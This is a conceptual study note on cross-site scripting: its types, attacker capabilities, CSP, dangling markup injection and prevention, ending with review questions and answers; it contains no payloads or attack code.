XSS with w3af, DVWA

Cross-site scripting

Cross-site scripting (XSS) is a type of security vulnerability that occurs when a website or web application doesn't properly validate or sanitize user input before displaying it to other users. This allows attackers to inject malicious scripts into web pages that are viewed by unsuspecting users.

In simpler terms, XSS happens when a website doesn't check the content that users input, and attackers can use this vulnerability to insert harmful code that affects other users visiting the site.

What are the types of XSS attacks?

• Reflected XSS, where the malicious script comes from the current HTTP request.
• Stored XSS, where the malicious script comes from the website's database.
• DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

Stored XSS vs Reflected XSS

Reflected Cross-Site Scripting (XSS) happens when an attacker puts harmful code into a website or app, and it bounces back to affect users right away.

Stored Cross-Site Scripting (XSS) occurs when an attacker inserts dangerous code that stays on a website or app's server and affects multiple users over time.

Both types of XSS attacks can lead to unauthorized actions or theft of information. Preventing them involves making sure websites and apps handle user data securely.

DOM-based cross-site scripting

DOM-based XSS arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

What can XSS be used for?

1. Impersonate or masquerade as the victim user.
2. Carry out any action that the user is able to perform.
3. Read any data that the user is able to access.
4. Capture the user's login credentials.
5. Perform virtual defacement of the web site.
6. Inject trojan functionality into the web site.

Content security policy

Content security policy (CSP) is a browser mechanism that aims to mitigate the impact of cross-site scripting and some other vulnerabilities.

Dangling markup injection

Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full cross-site scripting exploit is not possible, due to input filters or other defenses. It can often be exploited to capture sensitive information that is visible to other users, including CSRF tokens that can be used to perform unauthorized actions on behalf of the user.

How to prevent XSS attacks

1. Filter input on arrival
2. Encode data on output
3. Use appropriate response headers
4. Content Security Policy

Questions

Explain how a cross-site scripting attack works in non-technical terms.

In simple terms, an XSS attack happens when a sneaky person puts bad code on a website's comments section, and innocent people who visit the site end up running that bad code without realizing it.

What are the three types of XSS attacks?

Stored XSS, Reflected XSS & DOM XSS

If an attacker successfully exploits a XSS vulnerability, what malicious actions would they be able to perform?

Impersonate or masquerade as the victim user, carry out any action that the user is able to perform, read any data that the user is able to access, capture the user's login credentials, perform virtual defacement of the web site, inject trojan functionality into the web site.

What are some security controls that can be implemented to prevent XSS attacks?

Filter input on arrival, encode data on output, use appropriate response headers, Content Security Policy.